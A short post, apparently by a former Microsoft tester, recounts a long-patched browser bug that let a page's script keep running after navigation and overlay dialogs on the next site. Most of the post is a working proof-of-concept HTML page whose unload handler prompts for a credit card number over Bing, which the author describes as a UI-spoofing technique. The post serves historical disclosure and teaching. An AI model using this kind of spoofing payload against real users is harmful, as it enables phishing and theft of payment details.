This one surprised me. By assigning any object (rather than a function) to window.onbeforeunload, and then using window.onunload for the real payload, script from the original page continued executing after the user had fully navigated away — overlaid on top of whatever site they visited next.
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Resident_OnbeforeUnload_Onload</title>
</head>
<body>
<script language="JavaScript">
window.onbeforeunload = window;
window.onunload = function()
{
alert("Wow! This alert is being rendered once Bing is rendered!");
prompt("Enter your credit card:","");
}
</script>
</body>
</html>The key was assigning a non-function object to onbeforeunload — this bypassed the normal unload guard that would cancel the navigation prompt. The onunload handler then fired while the new page was already rendering, allowing alerts and prompts to appear in the context of the next site. This was a useful technique for spoofing UI elements over legitimate pages.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.